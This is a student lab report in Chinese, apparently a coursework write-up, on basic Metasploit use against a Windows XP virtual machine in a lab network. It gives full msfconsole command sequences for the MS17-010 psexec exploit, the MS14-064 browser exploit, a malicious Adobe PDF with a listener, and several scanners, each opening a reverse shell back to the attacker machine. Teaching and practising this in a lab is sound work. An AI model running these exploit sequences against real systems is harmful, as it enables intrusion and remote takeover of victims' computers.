2018-2019 20165237网络对抗 Exp5 MSF基础应用

2018-2019 20165237网络对抗 Exp5 MSF基础应用


实验目标

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
  • 一个主动攻击实践,如ms08-067; (1分)

ms17_010_psexec(√) 不唯一

  • 一个针对浏览器的攻击,如ms11-050;(1分)

ms14_064_ole_lode_execution(√)不唯一

  • 一个针对客户端的攻击,如Adobe;(1分)
  • adobe_geticon(√) 唯一
  • 成功应用任何一个辅助模块。(0.5分)

scanner/http/ssl_version(√)不唯一

scanner/portscan/tcp (√)不唯一

scanner/oracle/tnslsnr_version (√)唯一

  • 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

Exp 5.1 一个主动攻击实践-ms17-010

  • 攻击机:Kali(IP地址:192.168.153.135)
  • 靶机: windows XP(IP地址:192.168.153.136)
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > show payloads
msf exploit(windows/smb/ms17_010_psexec) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.153.135 //攻击机ip
msf exploit(windows/smb/ms17_010_psexec) > set LPORT 5237 //攻击端口
msf exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.153.136 //靶机ip,特定漏洞端口已经固定
msf exploit(windows/smb/ms17_010_psexec) > run //攻击

1298409-20190421125728146-1157560882.png

1298409-20190421130444241-1331508922.png

  • 攻击成功如下:
    1298409-20190421130457112-1949093037.png

Exp 5.2 对浏览器的攻击 ms14_064

  • 攻击机:Kali(IP地址:192.168.153.135)
  • 靶机: windows XP(IP地址:192.168.153.136)
msfconsole
msf > use windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp //http反向回连
set LHOST 192.168.153.135//攻击机ip
set Lport 5237//攻击端口固定
exploit //攻击
  • 可以看到生成的一个URL:http://192.168.153.135:8080/YT1IHT
    1298409-20190421131200751-1525247403.png

  • 在XP的IE上点开后:
    1298409-20190421131215043-1977813117.png

  • 回到Kali,查看sessions,输入sessions -i 4后,发现攻击成功,获得shell功能
    1298409-20190421131232527-1165743170.png


Exp 5.3 针对Adobe Reader软件的渗透攻击-adobe-geticon

  • 攻击机:Kali(IP地址:192.168.153.135)
  • 靶机: windows XP(IP地址:192.168.153.136)
    -依次输入以下指令:
search Adobe
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.153.135
set LPORT 5237
set filename 20165237.pdf
exploit

1298409-20190421131444199-6576152.png
1298409-20190421131453994-461741358.png

  • 找到pdf文件(要打开显示隐藏文件选项)

  • 接着输入以下代码
back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.153.135
set LPORT 5237
exploit
  • 接着在xp中点开pdf文件,回到kali,发现回传了一些东西。
    1298409-20190421131508982-1294479088.png
    1298409-20190421131532132-365762216.png
    1298409-20190421131609934-431222306.png

  • 查看sessions,输入session -i 1,发现攻击成功,可以使用shell。
    1298409-20190421131626331-77257756.png


Exp 5.4 辅助功能攻击-tcp+ssl_version+tnslsnr_version

  • 攻击机:Kali(IP地址:192.168.153.135)
  • 靶机: windows XP(IP地址:192.168.153.136)
  • 输入search auxiliary
  • 选择其中一个进行使用(其实我试了很多,成功的也挺多,但是和之前的人重复,所以我就多用了几个,可能会重复,但是我觉得效果很好)
  • tcp扫描成功:
    1298409-20190421131833434-758784960.png
    1298409-20190421131845080-1783354479.png

  • ssl版本模块扫描成功:
    1298409-20190421131856106-2067773149.png
    1298409-20190421131908411-1324980745.png

  • OracleSQL的监听服务攻击成功:
    1298409-20190421131926368-1135809113.png


实验感想和问题

  • 用自己的话解释什么是exploit,payload,encode?

exploit:针对靶机的漏洞,利用靶机中的后门,对靶机进行攻击。

payload:可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。说白了就是传送到靶机上的用来攻击的恶意代码。

encode:对payload进行编码

  • 离实战还缺些什么技术或步骤?
    1、在实践中发现MSF攻击的局限性很大,其中的漏洞几乎都是针对win XP系统,而实际应用的系统大部分是win7及以上的系统,如果需要实战攻击win7及以上的系统,还需要不断发现并成功利用新的漏洞。
    2、需要提高扫描等信息收集技术,信息收集是做攻击的重要前提,但大多数初级的扫描都会被win7及以上的系统发现甚至拒绝,所以提供相应的技术很重要。

  • 感想:

这次实验花费了很多时间去查找能攻击成功的漏洞,但是让我对于msf更加熟练,甚至更加崇拜,希望以后能够使用它更多的领域。

转载于:https://www.cnblogs.com/Miss-moon/p/10744827.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值